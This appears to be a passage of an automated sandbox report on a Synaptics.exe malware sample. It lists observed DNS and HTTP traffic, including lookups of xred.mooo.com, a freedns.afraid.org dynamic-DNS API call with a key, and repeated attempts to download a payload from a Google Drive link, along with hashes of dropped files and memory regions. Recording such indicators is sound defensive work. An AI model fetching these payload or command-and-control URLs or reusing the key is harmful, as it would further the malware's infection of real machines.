    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=J7i5n7HM2s8Q07qOtwCoMb2hcFceZckYBb4gF9M2jEm4sd5BCdxs92T50otl8_23_ccmSmHt0SPPQX1EWbi-kYUxuyZXbYNTW3t4iJhmHSlHkR1z7KX_lr-oDl775RwJj5ZFcWy91d8zF0xlPaBOEgzCLlhz2hnpEMBzCpAgRZDG150
    Response
    HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC7ltMT89LK2JNSF5SisGsA9l4bO6hDsQvt5h15r1UcvMlTXpk-rkflo5V1kPdjAYbXVau52vE0
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 01 Jan 2025 16:33:54 GMT
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-3bLA6ZvTtRTWhMvu32CaEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
  • flag-us
    DNS
    67.179.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.179.250.142.in-addr.arpa
    IN PTR
    Response
    67.179.250.142.in-addr.arpa
    IN PTR
    par21s19-in-f3.1e100.net
  • flag-us
    DNS
    174.214.58.216.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.214.58.216.in-addr.arpa
    IN PTR
    Response
    174.214.58.216.in-addr.arpa
    IN PTR
    mad01s26-in-f14.1e100.net
    174.214.58.216.in-addr.arpa
    IN PTR
    par10s42-in-f14.1e100.net
    174.214.58.216.in-addr.arpa
    IN PTR
    mad01s26-in-f174.1e100.net
  • flag-us
    DNS
    225.74.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    225.74.250.142.in-addr.arpa
    IN PTR
    Response
    225.74.250.142.in-addr.arpa
    IN PTR
    par10s40-in-f1.1e100.net
  • flag-us
    DNS
    30.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    30.243.111.52.in-addr.arpa
    IN PTR
    Response
  • 69.42.215.252:80
    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
    http
    Synaptics.exe
    430 B
    415 B
    6
    4

    HTTP Request

    GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    HTTP Response

    200
  • 216.58.214.174:443
    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    tls, http
    Synaptics.exe
    2.7kB
    11.3kB
    18
    14

    HTTP Request

    GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    303

    HTTP Request

    GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    303

    HTTP Request

    GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    303
  • 142.250.179.67:80
    http://c.pki.goog/r/r1.crl
    http
    Synaptics.exe
    303 B
    1.7kB
    4
    4

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    200
  • 142.250.179.67:80
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC
    http
    Synaptics.exe
    736 B
    1.6kB
    6
    4

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf

    HTTP Response

    200

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC

    HTTP Response

    200
  • 142.250.74.225:443
    https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    tls, http
    Synaptics.exe
    2.6kB
    14.7kB
    24
    21

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    404

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    404

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    HTTP Response

    404
  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    133.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    133.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    240.76.109.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    240.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    xred.mooo.com
    dns
    Synaptics.exe
    59 B
    118 B
    1
    1

    DNS Request

    xred.mooo.com

  • 8.8.8.8:53
    freedns.afraid.org
    dns
    Synaptics.exe
    64 B
    80 B
    1
    1

    DNS Request

    freedns.afraid.org

    DNS Response

    69.42.215.252

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 224.0.0.251:5353
    57 B
    1
  • 8.8.8.8:53
    252.215.42.69.in-addr.arpa
    dns
    144 B
    144 B
    2
    2

    DNS Request

    252.215.42.69.in-addr.arpa

    DNS Request

    252.215.42.69.in-addr.arpa

  • 8.8.8.8:53
    49.192.11.51.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    49.192.11.51.in-addr.arpa

  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    92.12.20.2.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    92.12.20.2.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    docs.google.com
    dns
    Synaptics.exe
    61 B
    77 B
    1
    1

    DNS Request

    docs.google.com

    DNS Response

    216.58.214.174

  • 8.8.8.8:53
    c.pki.goog
    dns
    Synaptics.exe
    56 B
    107 B
    1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.179.67

  • 8.8.8.8:53
    o.pki.goog
    dns
    Synaptics.exe
    56 B
    107 B
    1
    1

    DNS Request

    o.pki.goog

    DNS Response

    142.250.179.67

  • 8.8.8.8:53
    drive.usercontent.google.com
    dns
    Synaptics.exe
    74 B
    90 B
    1
    1

    DNS Request

    drive.usercontent.google.com

    DNS Response

    142.250.74.225

  • 8.8.8.8:53
    67.179.250.142.in-addr.arpa
    dns
    73 B
    111 B
    1
    1

    DNS Request

    67.179.250.142.in-addr.arpa

  • 8.8.8.8:53
    174.214.58.216.in-addr.arpa
    dns
    73 B
    173 B
    1
    1

    DNS Request

    174.214.58.216.in-addr.arpa

  • 8.8.8.8:53
    225.74.250.142.in-addr.arpa
    dns
    73 B
    111 B
    1
    1

    DNS Request

    225.74.250.142.in-addr.arpa

  • 8.8.8.8:53
    30.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    30.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\Synaptics\Synaptics.exe

    Filesize

    793KB

    MD5

    1951df1cc3262a172ce0bd85cc390d00

    SHA1

    e88411f0b9155eec15712630de1a45b654f52eb3

    SHA256

    98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56

    SHA512

    e06061133c6e987fc53fc1cfb3ddf5394a8d13d8635221bb98dc177f4c794ac3cb3adcbed810d47f6e212cd6082b44021ae9dbe0c113a1bff31a7cda9347aad1

  • C:\Users\Admin\AppData\Local\Temp\._cache_98d15d74b36ebb0709c4a2f476088a5889fa548029dc90e7e0a070b1f36c4e56N.exe

    Filesize

    40KB

    MD5

    83db3f55c5a97402b73de7fb23b77add

    SHA1

    7812537505190566cfc04c4708404e25c0750b4d

    SHA256

    af7120cdf209e98bfe63bbc98c176b57987976ab671ab25c5f71d3e72a13a168

    SHA512

    eee63a61b3e86ed029c2ab29bf477e3cc56c956321b29c7a36e947a9441c28bd46ebe629e3955b2339d494cc9cc905581e52af838d088c15b48fdcc557caa916

  • C:\Users\Admin\AppData\Local\Temp\3mdDEsCD.xlsm

    Filesize

    17KB

    MD5

    e566fc53051035e1e6fd0ed1823de0f9

    SHA1

    00bc96c48b98676ecd67e81a6f1d7754e4156044

    SHA256

    8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

    SHA512

    a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

  • C:\Users\Admin\AppData\Local\Temp\A0C75E00

    Filesize

    22KB

    MD5

    8f29bfad5cda71d6ace828951ed0a43d

    SHA1

    7e8578a126a38a236cacd939f7ee2c6336f364a7

    SHA256

    e2849a9d1255ba6abc7a5b2f02288b545ead79caf1b1df3c973e83019bc3a099

    SHA512

    c399abd5096f4b953d46e9bd2c0de603c127d104b36c723d10b15f45c0a047c9a5427d0699fe5bf171f3a4a174d1191bb931509dfb3c0f4109a57974153cdef6

  • memory/672-131-0x0000000002030000-0x0000000002031000-memory.dmp

    Filesize

    4KB

  • memory/672-194-0x0000000000400000-0x00000000004CC000-memory.dmp

    Filesize

    816KB

  • memory/672-195-0x0000000002030000-0x0000000002031000-memory.dmp

    Filesize

    4KB

  • memory/672-280-0x0000000000400000-0x00000000004CC000-memory.dmp

    Filesize

    816KB

  • memory/672-249-0x0000000000400000-0x00000000004CC000-memory.dmp

    Filesize

    816KB

  • memory/920-129-0x0000000000400000-0x00000000004CC000-memory.dmp

    Filesize

    816KB

  • memory/920-0-0x00000000007D0000-0x00000000007D1000-memory.dmp

    Filesize

    4KB

  • memory/2132-197-0x00007FF97E690000-0x00007FF97E6A0000-memory.dmp

    Filesize

    64KB

  • memory/2132-201-0x00007FF97C170000-0x00007FF97C180000-memory.dmp

    Filesize

    64KB

  • memory/2132-202-0x00007FF97C170000-0x00007FF97C180000-memory.dmp

    Filesize

    64KB

  • memory/2132-200-0x00007FF97E690000-0x00007FF97E6A0000-memory.dmp

    Filesize

    64KB

  • memory/2132-198-0x00007FF97E690000-0x00007FF97E6A0000-memory.dmp

    Filesize

    64KB

  • memory/2132-199-0x00007FF97E690000-0x00007FF97E6A0000-memory.dmp

    Filesize

    64KB

  • memory/2132-196-0x00007FF97E690000-0x00007FF97E6A0000-memory.dmp

    Filesize

    64KB
